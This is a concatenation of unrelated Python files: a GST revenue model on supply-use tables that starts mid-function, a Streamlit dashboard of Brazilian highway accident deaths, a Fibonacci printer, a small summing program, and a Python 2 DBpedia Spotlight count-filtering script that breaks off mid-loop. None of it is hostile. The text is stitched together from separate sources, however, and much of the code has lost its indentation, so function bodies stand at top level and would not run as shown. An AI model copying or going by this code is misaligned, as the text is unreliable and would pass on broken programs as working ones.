# Trade & Transport Margin Vector
trade_margin_col_excel = "BZ"
trade_margin_col = col2num(trade_margin_col_excel)
trade_margin_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,trade_margin_col-1]
trade_margin_vec = trade_margin_vec.values
# Product tax less subsidies Vector
tax_subsidies_col_excel = "BR"
tax_subsidies_col = col2num(tax_subsidies_col_excel)
tax_subsidies_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,tax_subsidies_col-1]
tax_subsidies_vec = tax_subsidies_vec.values
product_header = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row, supply_col_product_id-2:supply_col_product_id]
product_header = product_header.values
industry_header = df_supply.iloc[supply_row_industry_id-1, supply_mat_start_col-1:supply_mat_end_col]
industry_header = industry_header.values
# Product Header Dataframe to ensure rates are correctly matched
df_product = pd.DataFrame(data = product_header, columns = np.array(['srl_no', 'product_id']))
df_product['srl_no'] = df_product['srl_no'].astype(str)
'''
USE table
'''
df_use = pd.read_excel(filename, sheet_name_use, index_col=False,
header=None)
df_use.fillna(0, inplace=True)
use_mat_start_col_excel="C"
use_mat_end_col_excel="BP"
use_mat_start_col=col2num(use_mat_start_col_excel)
use_mat_end_col=col2num(use_mat_end_col_excel)
use_mat_start_row=4
use_mat_end_row=143
use_mat = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
use_mat_start_col-1:use_mat_end_col]
use_mat = use_mat.values
    # Private (household) final consumption Vector
fin_cons_hh_col_excel = "BR"
fin_cons_hh_col = col2num(fin_cons_hh_col_excel)
fin_cons_hh_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
fin_cons_hh_col-1]
fin_cons_hh_vec = fin_cons_hh_vec.values
# Govt. final consumption Vector
fin_cons_gov_col_excel = "BS"
fin_cons_gov_col = col2num(fin_cons_gov_col_excel)
fin_cons_gov_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
fin_cons_gov_col-1]
fin_cons_gov_vec = fin_cons_gov_vec.values
    # Gross fixed capital formation Vector
gfcf_col_excel ="BT"
gfcf_col = col2num(gfcf_col_excel)
gfcf_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,gfcf_col-1]
gfcf_vec = gfcf_vec.values
# Valuables Vector
vlbl_col_excel ="BU"
vlbl_col = col2num(vlbl_col_excel)
vlbl_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,vlbl_col-1]
vlbl_vec = vlbl_vec.values
# Change in stocks Vector
cis_col_excel ="BV"
cis_col = col2num(cis_col_excel)
cis_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,cis_col-1]
cis_vec = cis_vec.values
# Export Vector
export_col_excel = "BW"
export_col = col2num(export_col_excel)
export_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,export_col-1]
export_vec = export_vec.values
'''
GST Rates table
'''
df_rates = pd.read_excel(filename, sheet_name_rates, index_col=False,
header=0)
df_rates.fillna(0, inplace=True)
df_rates['weighted_rates'] = df_rates['rates'] * df_rates['weight']
df_rates = df_rates.groupby(['srl_no'])["weighted_rates"].sum()
df_rates = df_rates.reset_index()
df_rates = df_rates.values
df_rates = pd.DataFrame(data = df_rates, columns = np.array(['srl_no', 'rates']))
df_rates['srl_no'] = df_rates['srl_no'].astype(int)
df_rates['srl_no'] = df_rates['srl_no'].astype(str)
df_rates = pd.merge(df_rates, df_product,
how="inner", on="srl_no")
df_rates = df_rates[['product_id', 'rates']]
rate_vec = df_rates['rates'].values
'''
Exempt Supply vector
'''
df_exempt = pd.read_excel(filename, sheet_name_exempt, index_col=False,
header=0)
df_exempt.fillna(0, inplace=True)
df_exempt = df_exempt[['product_id', 'exempt']]
# merge with product id to ensure that the rates are correctly matched
df_exempt = pd.merge(df_product, df_exempt,
how="inner", on="product_id")
exempt_vec = df_exempt['exempt'].values
'''
GST Registered Ratio by Industry
'''
df_gst_reg_ratio = pd.read_excel(filename, sheet_name_reg_ratio, index_col=False)
industry_group_header = df_gst_reg_ratio['industry_group'].values
gst_reg_ratio_ind_vec = df_gst_reg_ratio['gst_reg_ratio'].values
return (supply_mat, tax_subsidies_vec, import_vec, trade_margin_vec,
industry_header, df_product, use_mat, fin_cons_hh_vec,
fin_cons_gov_vec, gfcf_vec, vlbl_vec, cis_vec, export_vec,
gst_reg_ratio_ind_vec, industry_group_header, rate_vec, exempt_vec)
# Function to blow up the values with a blow_up factor
def blow_up_mat(supply_mat, use_mat, import_vec, trade_margin_vec, tax_subsidies_vec,
export_vec, fin_cons_hh_vec, fin_cons_gov_vec, gfcf_vec, vlbl_vec,
cis_vec, blow_up_factor):
supply_mat *= blow_up_factor
use_mat *= blow_up_factor
import_vec *= blow_up_factor
trade_margin_vec *= blow_up_factor
tax_subsidies_vec *= blow_up_factor
export_vec *= blow_up_factor
fin_cons_hh_vec *= blow_up_factor
fin_cons_gov_vec *= blow_up_factor
gfcf_vec *= blow_up_factor
vlbl_vec *= blow_up_factor
cis_vec *= blow_up_factor
return (supply_mat, use_mat, import_vec, trade_margin_vec,
tax_subsidies_vec, export_vec, fin_cons_hh_vec,
fin_cons_gov_vec, gfcf_vec, vlbl_vec, cis_vec)
# Function to adjust supplies to taxpayers only to those who are registered
def adjusted_SUT(gst_reg_ratio_ind_vec, input_mat):
adj_input_mat = gst_reg_ratio_ind_vec*input_mat
return adj_input_mat
# Function to compute the output tax
def calc_output_tax(supply_mat, rate_vec):
output_tax_mat = supply_mat * rate_vec
return output_tax_mat
# Function to compute the ratio of ITC disallowed
def calc_itc_disallowed_ratio(supply_mat, exempt_vec):
exempt_supply_mat = supply_mat * exempt_vec
exempt_supply_ind_vec = calc_sum_by_industry(exempt_supply_mat)
supply_ind_vec = calc_sum_by_industry(supply_mat)
itc_disallowed_ratio = np.divide(exempt_supply_ind_vec, supply_ind_vec,
out=np.zeros_like(exempt_supply_ind_vec), where=supply_ind_vec!=0)
return (itc_disallowed_ratio, exempt_supply_mat)
# Function to compute the ITC disallowed
def calc_itc_disallowed(input_tax_credit_vec, itc_disallowed_ratio):
itc_disallowed_vec = input_tax_credit_vec * itc_disallowed_ratio
return itc_disallowed_vec
def calc_input_tax_credit(use_mat, rate_vec):
input_tax_credit_mat = use_mat * rate_vec
return input_tax_credit_mat
# Function to get the industry wise total of a variable (i.e supply, use, tax etc)
def calc_sum_by_industry(input_mat):
output_vec = input_mat.sum(axis=0)
output_vec = output_vec.reshape(1, output_vec.shape[0])
return output_vec
# Function to get the commodity wise total of a variable (i.e supply, use, tax etc)
def calc_sum_by_commodity(input_mat):
output_vec = input_mat.sum(axis=1)
output_vec = output_vec.reshape(output_vec.shape[0], 1)
return output_vec
# Function to calculate the ratio for allocating imports/exports/taxes/subsidies of a product to each industry
def calc_allocation_ratio(input_mat):
sum_by_prod_vec = input_mat.sum(axis=1)
sum_by_prod_vec = sum_by_prod_vec.reshape(sum_by_prod_vec.shape[0],1)
    # dividing input_mat by its per-product row totals while avoiding division by zero
output_mat = np.divide(input_mat, sum_by_prod_vec,
out=np.zeros_like(input_mat), where=sum_by_prod_vec!=0)
return output_mat
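# e.g. a row [2, 2] becomes [0.5, 0.5], while an all-zero row stays [0, 0]
# because of the where= guard passed to np.divide above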
# Function to calculate the ratio for allocating values of a product to each industry based on adjusted use matrix
def calc_allocation_by_use(use_mat, fin_cons_hh_vec ,fin_cons_gov_vec , gfcf_vec, vlbl_vec, cis_vec):
use_comm_vec = calc_sum_by_commodity(use_mat)
dom_use_vec = use_comm_vec + fin_cons_hh_vec + fin_cons_gov_vec + gfcf_vec + vlbl_vec + cis_vec
use_vec_ratio = use_comm_vec / dom_use_vec
fin_cons_hh_vec_ratio = fin_cons_hh_vec/ dom_use_vec
fin_cons_gov_vec_ratio = fin_cons_gov_vec/ dom_use_vec
gfcf_vec_ratio = gfcf_vec/ dom_use_vec
vlbl_vec_ratio = vlbl_vec/dom_use_vec
cis_vec_ratio = cis_vec/dom_use_vec
return (use_vec_ratio, fin_cons_hh_vec_ratio, fin_cons_gov_vec_ratio, gfcf_vec_ratio, vlbl_vec_ratio,
cis_vec_ratio)
# Function to allocate imports/exports/taxes/subsidies of a product to each industry proportionately
def calc_allocation_to_industry(allocation_mat, input_vec):
output_mat = allocation_mat * input_vec
return output_mat
# Function to calculate GST on imports
def calc_GST_on_imports(use_mat, import_vec, rate_vec):
allocation_ratio_by_use_mat = calc_allocation_ratio(use_mat)
import_mat = calc_allocation_to_industry(allocation_ratio_by_use_mat, import_vec)
GST_on_imports_mat = import_mat * rate_vec
GST_on_imports_ind_vec = calc_sum_by_industry(GST_on_imports_mat)
tot_GST_on_imports = GST_on_imports_ind_vec.sum()
return (GST_on_imports_ind_vec, tot_GST_on_imports)
# Function to export a vector by industry to a csv file
def make_ind_vec_df(input_vec, industry_header, output):
input_vec = input_vec.reshape(input_vec.shape[1], 1)
ind_df = pd.DataFrame(data=input_vec, index=industry_header, columns=np.array([output]))
ind_df = ind_df.reset_index()
ind_df = ind_df.rename(columns={'index':'industry_id'})
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name)
return ind_df
# Function to export a vector by product to a csv file
def make_comm_vec_df(input_vec, df_product, output):
input_vec = input_vec.reshape(input_vec.shape[0], 1)
ind_df = pd.DataFrame(data=input_vec, index=df_product['srl_no'], columns=np.array([output]))
ind_df = ind_df.reset_index()
ind_df = ind_df.rename(columns={'index':'srl_no'})
ind_df = pd.merge(df_product, ind_df,
how="inner", on="srl_no")
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name, index=False)
return ind_df
# Function to export a matrix to a csv file by converting it into vector by industry
def make_mat_ind_df(input_mat, industry_header, output):
input_vec = calc_sum_by_industry(input_mat)
make_ind_vec_df(input_vec, industry_header, output)
# Function to export a full matrix (products x industries) to a csv file
def make_mat_df(input_mat, df_product, industry_header, output):
#input_mat = input_vec.reshape(input_vec.shape[0], 1)
ind_df = pd.DataFrame(data=input_mat, index=df_product['srl_no'], columns=np.array(industry_header))
ind_df = ind_df.reset_index()
#ind_df = ind_df.rename(columns={'index':'srl_no'})
ind_df = pd.merge(df_product, ind_df,
how="inner", on="srl_no")
file_name = "Output_csv\\" + output + ".csv"
ind_df.to_csv(file_name, index=False)
return ind_df
# Function to extract the relevant tax data (tax payable, ITC and cash) from GSTR1 & GSTR3
def hsn_tax_data(filename, sheet_name_cash_ratio, sheet_name_gstr1, gst_collection_full_year_dom):
    # we have sample data by HS code on the output tax and the net GST paid (after input tax credit)
    # we use this data to calculate the ratio of net tax paid to output tax
    # we then apply this ratio to the data from
    # form GSTR1, which has only output tax data
    # calculating the net tax paid ratios
tax_cash_df = pd.read_excel(filename, sheet_name_cash_ratio, index_col=False)
tax_cash_df.fillna(0, inplace=True)
tax_cash_df['cash_tax_payable_ratio'] = tax_cash_df['tax_cash']/tax_cash_df['tax_payable']
tax_cash_df['HSN2'] = np.where(tax_cash_df['HSN2']>9, tax_cash_df['HSN2'].astype(str),
('0'+ tax_cash_df['HSN2'].astype(str)))
# extracting the data from gstr1
df_gstr1 = pd.read_excel(filename, sheet_name_gstr1, index_col=False)
df_gstr1.fillna(0, inplace=True)
df_gstr1['HSN2'] = np.where(df_gstr1['HSN2']>9, df_gstr1['HSN2'].astype(str),
('0'+ df_gstr1['HSN2'].astype(str)))
    # Data is for 8 months, grossed up here to one year
df_gstr1['gstr1_tax_payable'] = df_gstr1['gstr1_tax_payable'] * (12/8)
tax_cash_df = pd.merge(tax_cash_df, df_gstr1,
how="inner", on="HSN2")
    # applying the ratios calculated above to calculate the net tax paid
    # from the output tax given in GSTR1
tax_cash_df['tax_cash'] = (tax_cash_df['cash_tax_payable_ratio'] *
tax_cash_df['gstr1_tax_payable'])
tax_collection_gstr1 = tax_cash_df['tax_cash'].sum()
    # GSTR1 does not account for all the tax collected, so gross up
blow_up_factor = (gst_collection_full_year_dom/tax_collection_gstr1)
tax_cash_df['tax_payable_bu'] = df_gstr1['gstr1_tax_payable']*blow_up_factor
tax_cash_df['tax_cash_bu'] = tax_cash_df['tax_cash']*blow_up_factor
tax_cash_df['tax_itc_bu'] = (tax_cash_df['tax_payable_bu'] -
tax_cash_df['tax_cash_bu'])
#tax_cash_dom_less_trade = tax_cash_df['tax_cash_bu'].sum()
# the dataframe tax_cash explains the complete tax collected
# and breaks it down by HS Code
return tax_cash_df
# Function to get the unique combination for SUT srl_no and HSN-2 digit code
def hsn_sut_conc(filename, concordance_sheet):
concordance_df = pd.read_excel(filename, concordance_sheet, index_col=False)
hsn_df = concordance_df.sort_values(['HSN2', 'srl_no'])
hsn_df['HSN2'] = np.where(hsn_df['HSN2']>9, hsn_df['HSN2'].astype(str),
('0'+ hsn_df['HSN2'].astype(str)))
hsn_df['key'] = hsn_df['srl_no'].astype(str) + '_' + hsn_df['HSN2']
hsn_df = hsn_df.drop_duplicates(subset='key', keep='first')
hsn_df = hsn_df.reset_index()
hsn_df = hsn_df.drop(['index', 'key', 'HSN', 'product_id'], axis=1)
hsn_df['srl_no'] = hsn_df['srl_no'].astype(str)
return hsn_df
def concord_comm_vec(hsn_df_copy, alloc_mat, alloc_var):
# concording the srl_no data and allocating to industry
# allocation is based on the distribution by srl_no
# as per alloc_mat - Supply or Use
# we first create a dataframe with the totals of supply by commodity
# i.e. by Srl_no
alloc_comm_vec = calc_sum_by_commodity(alloc_mat)
alloc_comm_vec_df = pd.DataFrame(data=alloc_comm_vec, columns=np.array([alloc_var]))
alloc_comm_vec_df = alloc_comm_vec_df.reset_index()
alloc_comm_vec_df = alloc_comm_vec_df.rename(columns={'index':'srl_no'})
alloc_comm_vec_df['srl_no'] = alloc_comm_vec_df['srl_no'] + 1
alloc_comm_vec_df['srl_no'] = alloc_comm_vec_df['srl_no'].astype(str)
    # we then merge this onto the srl_no-HSN concordance file
# to allocate a HSN for each serial number
hsn_df_copy = pd.merge(hsn_df_copy, alloc_comm_vec_df,
how="outer", on="srl_no")
# we then group the alloc_var eg. output by HSN
alloc_hsn2 = hsn_df_copy.groupby('HSN2')[alloc_var].sum()
alloc_hsn2 = alloc_hsn2.values
alloc_hsn2_df = pd.DataFrame(data=alloc_hsn2, columns=np.array([alloc_var+'_hsn2']))
alloc_hsn2_df = alloc_hsn2_df.reset_index()
alloc_hsn2_df = alloc_hsn2_df.rename(columns={'index':'HSN2'})
alloc_hsn2_df['HSN2'] = np.where(alloc_hsn2_df['HSN2']>9, alloc_hsn2_df['HSN2'].astype(str),
('0'+ alloc_hsn2_df['HSN2'].astype(str)))
    # we merge the alloc_var (e.g. output) by HSN back onto the srl_no-HSN
    # concordance; we now have the HSN-wise total of alloc_var (e.g. output)
    # mapped to every srl_no
hsn_df_copy = pd.merge(hsn_df_copy, alloc_hsn2_df,
how="outer", on="HSN2")
hsn_df_copy = hsn_df_copy.dropna()
    # we calculate the weight of each srl_no's output (alloc_var) over the
    # total output of its HSN code
    # this gives the proportion of the HSN-level output (alloc_var) that
    # belongs to one particular srl_no
hsn_df_copy['srl_HSN_wt'] = hsn_df_copy[alloc_var]/hsn_df_copy[alloc_var+'_hsn2']
hsn_df_copy = hsn_df_copy.sort_values('HSN2')
# we then use these weights to allocate the parameter we are trying to
# apportion by srl_no
    if alloc_var == 'output tax':
        hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_payable_bu']
    elif alloc_var == 'itc':
        hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_itc_bu']
    elif alloc_var == 'tax':
        hsn_df_copy['alloc_var_srl_no'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_cash_bu']
    elif alloc_var == 'etr':
        hsn_df_copy['alloc_var_srl_no1'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['tax_payable']
        hsn_df_copy['alloc_var_srl_no2'] = hsn_df_copy['srl_HSN_wt'] * hsn_df_copy['taxable_value']
hsn_df_copy['srl_no'] = hsn_df_copy['srl_no'].astype(int)
hsn_df_copy = hsn_df_copy.sort_values('srl_no')
    # grouping by serial number, since there are multiple entries per srl_no
if alloc_var=='etr':
srl_no_alloc_var1 = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no1'].sum()
srl_no_alloc_var2 = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no2'].sum()
srl_no_alloc_var = np.where(srl_no_alloc_var2==0, 0, srl_no_alloc_var1/srl_no_alloc_var2)
srl_no_alloc_var_vec = srl_no_alloc_var.reshape(srl_no_alloc_var.shape[0], 1)
else:
srl_no_alloc_var = hsn_df_copy.groupby('srl_no')['alloc_var_srl_no'].sum()
# hsn_df[['srl_no', 'HSN2', 'tax_cash_bu', 'srl_HSN_wt', 'tax_cash_bu_srl_no']]
srl_no_alloc_var_df = srl_no_alloc_var.reset_index()
srl_no_alloc_var_df['srl_no'] = srl_no_alloc_var_df['srl_no'].astype(int)
srl_no_alloc_var_df = srl_no_alloc_var_df.sort_values('srl_no')
# srl_no_alloc_var_df.to_csv('srl_no_tax_cash.csv')
srl_no_alloc_var_vec = srl_no_alloc_var_df['alloc_var_srl_no'].values
srl_no_alloc_var_vec = srl_no_alloc_var_vec.reshape(srl_no_alloc_var_vec.shape[0], 1)
return srl_no_alloc_var_vec
def concord_ind_vec(srl_no_alloc_var_vec, allocation_ratio):
alloc_var_mat = calc_allocation_to_industry(allocation_ratio, srl_no_alloc_var_vec)
# np.savetxt("Output_csv\\alloc_sec.csv", alloc_var_mat , delimiter=",")
alloc_var_ind_vec = calc_sum_by_industry(alloc_var_mat)
return alloc_var_ind_vec
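# Hedged illustration (not part of the original pipeline): the core idea behind
# concord_comm_vec is to split an HSN-level total across serial numbers in
# proportion to each srl_no's share of that HSN's output. A minimal, self-contained
# sketch with made-up numbers:
def _demo_srl_hsn_apportionment():
    import pandas as pd
    demo = pd.DataFrame({
        'srl_no': ['1', '2', '3'],
        'HSN2': ['01', '01', '02'],
        'output': [30.0, 70.0, 50.0],             # alloc_var by srl_no
        'tax_payable_bu': [200.0, 200.0, 80.0]})  # HSN-level total repeated on each row
    hsn_total = demo.groupby('HSN2')['output'].transform('sum')
    demo['srl_HSN_wt'] = demo['output'] / hsn_total
    # srl_no 1 receives 0.3 * 200 = 60, srl_no 2 receives 140, srl_no 3 receives 80
    demo['alloc_var_srl_no'] = demo['srl_HSN_wt'] * demo['tax_payable_bu']
    return demo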
|
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
import os, urllib
from sklearn.linear_model import LinearRegression
from sklearn.datasets import make_regression
import matplotlib.pyplot as plt
from data_cleaner import data_cleaner_funtion
from regression import regression_function
from bokeh.plotting import figure
def main():
st.sidebar.title("Selecione a página")
app_mode = st.sidebar.selectbox("",
["Exploração de dados", "Modelagem"])
if app_mode == "Exploração de dados":
explorantion_page()
elif app_mode == "Modelagem":
modelagem_page()
@st.cache(show_spinner=False)
def load_data():
with st.spinner("Carregando dataset"):
        # a message here to show that the data is being loaded would be nice...
url = 'https://bitbucket.org/SamuelHericlesBit/datasets/raw/f54dca5ffc162c58d66ff75c2df601e4f31c061c/acidentes2019_todas_causas_tipos.csv'
df = pd.read_csv(url, sep = ';', encoding = 'latin-1')
return data_cleaner_funtion(df)
df = load_data()
def freq_without_percent(x: pd.Series):
contagem = x.value_counts()
# percentual = round((x.value_counts() / x.shape[0]) * 100, 3)
res = pd.DataFrame({'Qtd.': contagem})
return res
def freq(x: pd.Series, plot=False):
contagem = x.value_counts()
percentual = round((x.value_counts() / x.shape[0]) * 100, 3)
res = pd.DataFrame({'Qtd.': contagem, 'Percentual': percentual})
if plot:
plt.show()
return res.sort_values('Percentual',ascending=False)
# Exploration
def explorantion_page():
st.markdown('## Exploração dos dados')
st.markdown("### Ranking de mortos por município")
table_temp = df.groupby("municipio")["mortos"].sum().sort_values(ascending=False).head(10)
st.dataframe(table_temp)
st.markdown("### Ranking de mortos por rodovia")
table_temp = df.groupby("br")["mortos"].sum().sort_values(ascending=False).head(10)
st.dataframe(table_temp)
    # chart
# st.markdown("### Gráfico da quantidade de mortes por ocorrência no período de 04/2019 à 06/2019")
# df_prov = df.loc[df['data_inversa'] >= '2019-04']
# df_prov = df_prov.loc[df_prov['data_inversa'] <= '2019-06']
# st.line_chart(df_prov)
st.markdown("### Quantidade de mortes em ocorrências por estado")
df_prov = df.groupby("uf")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de tipos de acidentes por mortos")
df_prov = df.groupby("tipo_acidente")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de tipos de acidentes por traçado da via")
df_prov = df.loc[df['tipo_acidente'] == 'Colisão frontal']
df_prov = df_prov.groupby("tracado_via")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de causas de acidente por mortos no total")
df_prov = df.groupby("causa_acidente")["mortos"].sum().sort_values(ascending=True)
st.bar_chart(df_prov)
st.markdown("### Agrupamento de dias da semana por mortos no total")
df_prov = df.groupby("dia_semana")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
st.markdown("### Quantidade de mortes por condição metereológica")
df_prov = df.groupby("condicao_metereologica")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
st.markdown("### Quantidade de mortes pela fase do dia")
df_prov = df.groupby("fase_dia")["mortos"].sum().sort_values(ascending=False)
st.bar_chart(df_prov)
    # work on an explicit copy so the original dataframe is not modified
    df_copy = df.copy()
st.markdown("### Quantidade de mortes em relação a idade dos envolvidos")
df_remove = df_copy.loc[(df['idade'] == 0)]
df_novo = df_copy.drop(df_remove.index)
df_prov = df_novo
df_prov = df_prov.groupby("idade")["mortos"].sum().sort_values(ascending=False).head(25)
st.bar_chart(df_prov)
st.markdown("### Quantidade de ocorrências por fase do dia")
df_prov = freq_without_percent(df.fase_dia.sort_values(ascending=False))
st.bar_chart(df_prov)
# Ranking
st.markdown("## Ranking's")
st.markdown("### Ranking do percentual de ocorrências por estado")
st.write(freq(df.uf, plot=True).head(10))
st.markdown("### Ranking do percentual de ocorrências por condição metereologica")
st.write(freq(df.condicao_metereologica, plot=True).head(10))
st.markdown("### Ranking do percentual de causa de acidentes")
st.write(freq(df.causa_acidente, plot=True).head(10))
st.markdown("### Ranking do percentual de tipo de acidente")
st.write(freq(df.tipo_acidente, plot=True).head(10))
st.markdown("### Ranking de ocorrência por tipo de via")
st.write(freq(df.tipo_pista, plot=True))
st.markdown("### Ranking de ocorrência por tipo de traçado da via")
st.write(freq(df.tracado_via, plot=True))
# Modeling
inputs = []
def modelagem_page():
st.markdown('# Modelagem dos dados')
br = st.sidebar.selectbox('Escolha uma BR', df['br'].unique())
idade = st.sidebar.slider('Escolha a idade do condutor', 18, 100)
fase_dia = st.sidebar.selectbox('Escolha uma fase do dia', df['fase_dia'].unique())
fase_dia = list(df['fase_dia'].unique()).index(fase_dia) + 1
estado = st.sidebar.selectbox('Escolha um estado', df['uf'].unique())
municipio = st.sidebar.selectbox('Escolha um municipio', df.query('uf == "%s"' % estado)['municipio'].unique())
municipio = list(df.query('uf == "%s"' % estado)['municipio'].unique()).index(municipio) + 1
cond_meteorologica = st.sidebar.selectbox('Escolha uma condição meteorológica', df['condicao_metereologica'].unique())
cond_meteorologica = list(df['condicao_metereologica'].unique()).index(cond_meteorologica) + 1
dia_semana = st.sidebar.selectbox('Escolha um dia da semana', df['dia_semana'].unique())
dia_semana = list(df['dia_semana'].unique()).index(dia_semana) + 1
inputs = [br, idade, fase_dia, cond_meteorologica, municipio, dia_semana]
st.markdown('### Categorias de periculosidade da predição')
st.markdown("``Perigo muito elevado!``")
st.markdown("``Perigo acima da média``")
st.markdown("``Perigo baixo``")
st.markdown("``Perigo abaixo da média``")
st.markdown("``Perigo médio``")
st.write('Array de inputs')
st.write(inputs)
if st.sidebar.button('Predict!'):
with st.spinner('Carregando predição'):
result = regression_function(df, inputs)
st.markdown('### Predição da via:')
st.write(result)
if __name__ == "__main__":
main()
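# Hedged usage note (the filename is an assumption, not taken from the source):
# the app is launched from the command line with
#     streamlit run app.py
# Streamlit executes the script as __main__, so main() above builds the sidebar
# navigation and renders the selected page.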
|
# -*- coding:utf-8 -*-
'''
Created on 2016-04-01
@author: huke
'''
def fib(max):
    # print the first `max` Fibonacci numbers, one per line
    n, a, b = 0, 0, 1
    while n < max:
        print(b)
        a, b = b, a + b
        n += 1
    return "done"
if __name__ == '__main__':
fib(8)
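# Expected output of fib(8): the first eight Fibonacci numbers, one per line:
# 1 1 2 3 5 8 13 21 (the function itself returns the string "done").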
|
# read a line of space-separated integers; the first positive value is the starting
# term `a`, the second positive value is the number of terms `n`, and the program
# prints the sum a + (a+1) + ... + (a+n-1)
l = input().split(' ')
s, a, n, c = 0, 0, 0, 0
while a == 0 or n == 0:
    if int(l[c]) > 0:
        if a == 0:
            a = int(l[c])
        elif n == 0:
            n = int(l[c])
    c += 1
for c in range(0, n):
    s += a + c
print(s)
|
# -*- coding: utf-8 -*-
"""
Build a modified DBpedia Spotlight model by manipulating the raw data.
"""
import os, json, urllib2, sys, re
import unicodecsv as csv
from collections import defaultdict
from vocabulary import get_target_db
csv.field_size_limit(sys.maxint)
target_db = get_target_db()
def uri_to_id(uri, split_str="resource/"):
"""Split and unquote a URI to obtain a unicode ID.
"""
id_part = uri.split(split_str)[-1]
if id_part.startswith('/'):
id_part = id_part[1:]
return urllib2.unquote(id_part.encode('utf-8')).decode('utf-8')
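# Illustrative examples (not present in the original source); the behaviour follows
# from splitting on split_str, urllib2.unquote, and UTF-8 decoding:
#   uri_to_id("http://dbpedia.org/resource/Berlin")            -> u"Berlin"
#   uri_to_id("http://dbpedia.org/resource/Caf%C3%A9")         -> u"Café"
#   uri_to_id("http://xx.org/wiki/Berlin", split_str="wiki/")  -> u"Berlin"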
def rewrite_tsv(file_path, rewrite_row, count_deltas=None):
"""Loop through the file at file_path and call
rewrite_row for each row. Modified rows are written
to a new output file.
"""
path, fname = os.path.split(file_path)
dirpath, dirname = os.path.split(path)
out_dirpath = os.path.join(dirpath, dirname+"_modified")
if not os.path.exists(out_dirpath):
        os.makedirs(out_dirpath)
with open(file_path, 'rb') as in_f:
tsvr = csv.reader(
in_f, delimiter='\t', encoding='utf-8', quotechar="|",
quoting=csv.QUOTE_NONE, lineterminator='\n'
)
with open(os.path.join(out_dirpath, fname), 'wb') as out_f:
tsvw = csv.writer(
out_f, delimiter='\t', encoding='utf-8', quotechar="|",
quoting=csv.QUOTE_NONE, lineterminator='\n', escapechar=None
)
for i, row in enumerate(tsvr):
mod_rows = rewrite_row(row, count_deltas)
for row in mod_rows:
try:
tsvw.writerow(row)
except csv.Error:
clean = clean_row(row)
tsvw.writerow(clean)
if i % 10000 == 0:
print "Processed %i0K rows from %s" % (i/10000, file_path)
return count_deltas, out_dirpath
def clean_row(row):
clean = []
print "clean_row(%s)" % repr(row)
for col in row:
if isinstance(col, basestring):
clean.append(re.sub(r'\W+', '', col.split('\t')[0]))
else:
clean.append(col)
return clean
# UriCounts, TokenCounts
# TODO: deal with redirects & disambiguation pages
## if unicode_id not in target_db: del row
def uri_counts(file_path):
def dbp_filter(row, _):
if uri_to_id(row[0]) in target_db:
return [row]
else:
return []
rewrite_tsv(file_path, dbp_filter)
def token_counts(file_path):
def wiki_filter(row, _):
if uri_to_id(row[0], split_str='wiki/') in target_db:
return [row]
else:
return []
rewrite_tsv(file_path, wiki_filter)
# PairCounts
"""Pseudocode
for row in tsvreader:
if unicode_id not in target_db:
count_deltas[surface_form] -= count
del row
elif not surface_form.islower():
count_deltas[surface_form.lower()] += count
duplicate row with surface_form.lower()
json.dump(count_deltas, f)
"""
def pair_counts(file_path):
def lowercase_duplicate(row, count_deltas):
if uri_to_id(row[1]) in target_db and len(row[0]) < 70:
if not row[0].islower():
count_deltas[row[0].lower()] += int(row[2])
add_row = [row[0].lower(), row[1], row[2]]
return [row, add_row]
else:
return [row]
else:
count_deltas[row[0]] -= int(row[2])
return []
deltas_dict = defaultdict(int)
count_deltas, base_path = rewrite_tsv(
file_path, lowercase_duplicate, deltas_dict
)
cd_path = os.path.join(base_path, "count_deltas.json")
with open(cd_path, 'wb') as jfile:
json.dump(count_deltas, jfile)
return count_deltas
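# Hedged illustration (sample values only): for a pairCounts row such as
#   ["Berlin", "http://dbpedia.org/resource/Berlin", "120"]
# lowercase_duplicate keeps the original row, emits an extra ["berlin", <uri>, "120"]
# row, and records count_deltas["berlin"] += 120 so sfAndTotalCounts can be adjusted
# later; rows whose URI is not in target_db are dropped and their count is subtracted
# from count_deltas for that surface form.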
# SFandTotalCounts
"""Pseudocode
for row in tsvreader:
this_change = count_deltas.pop(surface_form, 0)
if this_change:
if count < 0:
count = this_change
else:
count += this_change
if count <= 0:
count = -1
for sf, dc in count_deltas.iteritems():
append row [sf, dc, -1]
"""
def sf_and_total_counts(file_path, count_deltas, add_lowercase=True):
def update_counts(row, count_deltas):
this_change = count_deltas.pop(row[0], 0)
if this_change:
sf_count, total_count = int(row[1]), int(row[2] or -1)
if sf_count < 0:
sf_count = this_change
else:
sf_count += this_change
if sf_count <= 0:
sf_count = -1
if total_count != -1 and total_count < sf_count:
total_count = sf_count
if max(sf_count, total_count) > 0:
return [[row[0], sf_count, total_count]]
else:
return []
else:
return [row]
_, base_path = rewrite_tsv(file_path, update_counts, count_deltas)
if add_lowercase:
# Add rows for lowercase duplicates
_, fname = os.path.split(file_path)
with open(os.path.join(base_path, fname), 'a') as out_f:
tsvw = csv.writer(
out_f, delimiter='\t', encoding='utf-8', quoting=csv.QUOTE_NONE,
lineterminator='\n', escapechar=None, quotechar="|"
)
print "Adding {0} lowercase duplicates".format(len(count_deltas))
for sf, dc in count_deltas.iteritems():
